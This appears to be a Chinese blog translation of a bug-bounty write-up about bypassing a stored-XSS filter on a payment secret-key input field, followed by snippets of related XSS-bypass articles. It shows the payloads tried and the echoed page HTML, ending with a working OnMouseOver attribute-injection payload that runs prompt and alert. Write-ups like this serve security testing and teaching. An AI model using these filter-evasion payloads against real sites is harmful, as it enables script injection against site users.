一个存储型xss的bypass案例

最新推荐文章于 2025-07-12 11:39:33 发布
原创 最新推荐文章于 2025-07-12 11:39:33 发布 · 2.4k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了在一次私人网站的安全测试中,如何通过巧妙构造Payload,成功绕过存储型XSS过滤并触发XSS攻击的过程。作者PrialIslamKhan在测试过程中发现,尽管常规的XSS尝试被过滤,但通过添加特定的HTML属性,如OnMouseOver,仍能执行JavaScript代码,最终实现了XSS漏洞的利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

翻译:

原文地址:https://medium.com/bugbountywriteup/story-of-a-stored-xss-bypass-26e6659f807b

漏洞类型:存储型xss

作者:Prial Islam Khan

 

……

最近我在测试一个私人网站,在该网站中,用户可以添加他们的个人信息。我注意到一个名为Secret Key的输入,它允许用户处理付款并将交易信息存储到应用程序中。

所以我输入正常的xss的payload:

“><img src=x οnerrοr=prompt(document.domain)>

它被过滤了,页面的代码如下:

<input type="text" id="****" name="****" value="">&lt;img img" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

从这个页面代码我们能够看出来:

1、“和> 没有完全被过滤

2、危险标签被过滤了,比如<img>过滤后变成img img

 

所以我现在有两种可能的方法去执行javascript代码,第一种方法使用某种方法去绕过<的过滤,第二种方法是添加恶意的HTML属性去执行javascript文件。所以我尝试了很多种方法去绕过<,但是行不通。我现在打算去使用第二种方法(添加一个恶意的HTML标签),所以我输入了以下xss的payload

“ OnMouseOver=prompt(1)

页面回显如下:

<input type="text" id="****" name="****" value="" OnMouseOver=prompt&#40;" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

我可以去添加一个HTML属性,但是这个括号被完全过滤了,所以我继续输入以下payload:

“ OnMouseOver=prompt`1`

页面回显如下:

<input type="text" id="****" name="****" value="" OnMouseOver=prompt`1`" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

但是代码没有被执行,仔细看了一眼,这个payload执行的话只需要一个",完整payload如下:

“ OnMouseOver=”prompt`1`

页面回显如下:

<input type="text" id="ipn_secret_keygen" name="ipn_secret_keygen" value=""OnMouseOver="alert`1`" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

看起来很不错,现在我将我的鼠标指针移动到输入处,这个OnMouseOver事件执行了XSS成功弹窗

谢谢阅读,我希望有时间将会写更多的帖子

 

 

3. XSS_ByPass
HWHXY的博客
01-17 315
layout: post title: 3. XSS_ByPass category: SRC tags: SRC keywords: SRC,XSS 前言 该篇记录为记录实际的src过程第3篇小文章,内容为某网站的xssbypassxss特征 在修改个人头像信息的地方没有过滤" and <,导致了这次的xss的触发,而我认为,基本所有的如上情况都是有很大可能触发xss的。后端存在一些waf,存在的形式是黑名单。例如: <script>,<a>这样的形式均会将<&.
RCE姿势学习:从存储XSS漏洞到RCE利用
2301_79205724的博客
08-31 710
很多同学在挖掘漏洞的中期都会有一个疑问:为什么别人挖到的都是高危或者严重漏洞,而我总是只能挖到一些信息泄露或者常规的XSS呢?来询问这个问题的人其实非常非常多,但其实归根结底都是一个原因,漏洞没有深入利用。所以今天咱们就来学习一下大佬们是怎么利用一个XSS来RCE的思路吧。后续利用RCE的内容比较难,需要有一定编程能力才能比较好理解,所以前面说到漏洞没有深入利用的问题,其原因百分之八十是源于你基础不够扎实,你的“地基”决定了你的高度,所以呀学习千万不能图快学成个脚本小子哦。
xssbypass_XSS Bypass
weixin_36463451的博客
12-23 333
如果无法学会绕过,那就只有一个结果:Bypass学习文章来源:米斯特安全团队JS代码往往要在标签内或者在 “On” 事件和 “javascript” 伪协议内才可以执行。标签表达式: 没被安全狗过滤的标签:a b q br dd dl dt h1 h2 h3 h4 h5 h6 hr bdi bdo big del dfn dir div kbd map var wbr abbr area base...
XSS漏洞03】XSS漏洞验证、语句构造与绕过方法_xss验证
最新发布
wly55690的博客
07-12 361
了解漏洞验证相关概念含义;掌握XSS漏洞验证的方法;掌握XSS语句构造的5种方法;掌握XSS语句绕过的8种方法。
XSS Bypass
Grey的博客
07-30 1432
1XSS攻击原理 XSS原称为CSS(Cross-Site Scripting),因为和层叠样式表(Cascading Style Sheets)重名,所以改称为XSS(X一般有未知的含义,还有扩展的含义)XSS攻击涉及到三方:攻击者,用户,web server。用户是通过浏览器来访问web server上的网页,XSS攻击就是攻击者通过各种办法,在用户访问的网页中插入自己的脚本,让其在用...
XSS bypass
Fly_鹏程万里
12-18 1243
前言 在开始之前,我们先说一说XSS漏洞挖掘思路流程: 思路流程: 1、查找输入点与输出点的位置:      输入点好找,一般都是URL当中的参数,或者表单内容项等,而输出点一般有以下常见的几种情形: 输出在标签之间,例如:&lt;script&gt;输出&lt;/script&gt; 输出在属性之中,例如:&lt;input value="输出" name="keyword"&gt; ...
XSSBypass:XSS绕过技术
05-17
- 存储XSS:攻击者的脚本被存储在服务器上,然后在多个用户访问同一页面时触发。 - 反射XSS:脚本通过URL参数传递,只有当用户点击恶意链接时才会被执行。 - DOM-Based XSS:不涉及服务器,而是由于网页DOM...
xss常见的bypass方案
03-06
在网络安全领域,XSS(Cross-Site Scripting)攻击是一种常见的威胁,它允许攻击者在...理解并掌握这些XSS bypass方案对于提高网络安全防护能力至关重要,无论是对于攻击者还是防守者,都是一个不断进化的猫鼠游戏。
DVWA关卡12:Content Security Policy (CSP) Bypass存储XSS
m0_54899775的博客
12-12 1338
DVWA关卡12:Content Security Policy (CSP) Bypass存储XSS
xss_bypass_cookbook_4.0.pdf.zip_XSS
09-23
XSS攻击通常分为三种类:反射XSS存储XSS和DOMXSS。反射XSS是通过诱使用户点击含有恶意脚本的链接来触发,攻击代码在页面加载时短暂执行。存储XSS更为严重,因为它将恶意脚本存储在服务器上,任何访问...
XSS Bypass Cookbook
晓川吖的专栏
09-13 392
1 引言 在目前的web安全漏洞中,xss一直属于热门的一类,而它对用户造成的危害较大。 因此也引发了不少安全爱好者和专业工程师的研究。 而html5等新技术的使用和具体业务场景中复杂的环境带给了xss更大的生存空间。 而且不同xss向量也因为浏览器的特性会有所区别 比如chrome在加载资源时会校验服务器返回的mimeType 而firefox则根据标签自己设定的type来做出处理 本文在目前较为常见的几种过滤条件下,简单的探讨了xss这一技术的应用以及绕过 1.1 研究范围 XSS在各种具体业.
XSS————2、XSS bypass
Fly_鹏程万里
10-19 8329
0x00前言 XSS有反射、存储、DOM三种类,不同类xss的危害各不相同,下面做一个简要说明: 数据流向: 反射:浏览器——》后端——》浏览器 存储:浏览器——》后端——》数据库——》后端——》浏览器 DOM:URL——》浏览器 易用程度: 存储 &gt; DOM &gt; 反射 接下来我们就进入正题————“XSS技巧”,在本篇文章当中我们将对xss绕过技巧做一个系统...
C# 实现 java URLEncoder.encode编码
别看,很懒,随心
09-08 3114
** 最近碰到一个很坑很难受的问题,公司对接一个java项目碰到C# url编码跟java url编码后不一样,导致最后加密结果不一样 ** C# 中文url编码后是小写的 java 中文url编码后是大写的,且会对非安全字符进行编码 不说了,直接上码: 这里得注意一下,有些地方个别情况特殊符号没进行编码的,还是得自己手动Replace一下对应编码 public static class Utils { private static string UrlEncode(this str
8. xss bypass
HWHXY的博客
01-17 339
layout: post title: 8. xss bypass category: SRC tags: SRC keywords: SRC,XSS 前言 该篇记录为记录实际的src过程第8篇小文章,内容为某网站的xssbypassXSS特征 这个点是一处app发布,可以插入a标签和img标签,但是a标签只能插入链接,否则会出错。条件很苛刻。 这时就想到了再找一个反射,把反射链接插进去,就相当于a+反射=点击存储。思路正确!开始找反射,好不容易找到一个,但是waf极强, on属性基本被消灭,遗留下来.
XSS 绕过思路 bypass 之日天日地日空气
None安全团队
10-25 1238
前文 Hello,大家好,我是None Sec的C_soon5,今天给大家讲讲XSS Bypass XSS挖掘思路 1:输入点和输出点进行XSS 输入点 URL参数 表单内容 JSONP 输出点 输出在标签之间,例如:<script>输出</script> 输出在属性之中,例如:<input value="输出" name="keyword"> 输出在注释之中,例如://document.getElementById("order_s..
html中的基本标签
weixin_44956916的博客
09-12 222
Day 01学习笔记 一、讲在前面的知识 1.1 前端开发工程师在整个开发流程中的位置 产品经理:提需求 UI设计师 前端设计师 后端工程师 测试工程师 1.2 前后端开发 前端:也叫客户端 后端:也叫服务端 1.3软件结构 B/S:浏览器/服务器 客户端设备上有浏览器就可以 ​ 优点:免安装,更新更及时 ​ 缺点:没一次需要现下载代码,速度较c/s慢 C/S:客户端/服务器 需要在客户端设备上安装客户端软件 ​ 优点:速度快 ​ 缺点: 1
XSS技巧拓展】————9、XSS Bypass Cookbook
Fly_鹏程万里
01-14 1090
1 引言 在目前的web安全漏洞中,xss一直属于热门的一类,而它对用户造成的危害较大。因此也引发了不少安全爱好者和专业工程师的研究。而html5等新技术的使用和具体业务场景中复杂的环境带给了xss更大的生存空间。而且不同xss向量也因为浏览器的特性会有所区别比如chrome在加载资源时会校验服务器返回的mimeType而firefox则根据标签自己设定的type来做出处理本文在目前较为常见的几...
xssbypass_XSS bypass姿势
weixin_34122028的博客
12-27 808
一位苦于信息安全的萌新小白帽本实验仅用于信息防御教学,切勿用于它用途公众号:XG小刚尝试构造xss,突破各种限制闭合标签通过各种方式,闭合前面的语句常规闭合"><script>alert(1);script>闭合大部分标签*/-->'");>iframe>script>style>title>textarea><...
XSS漏洞绕过技巧完全指南
1. XSS攻击的基础知识:介绍什么是XSS攻击、XSS攻击的种类(如反射XSS存储XSS和基于DOM的XSS)以及XSS攻击的影响。 2. 攻击向量的识别:讲解如何识别Web应用中的潜在XSS攻击向量,包括输入点(如表单、URL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值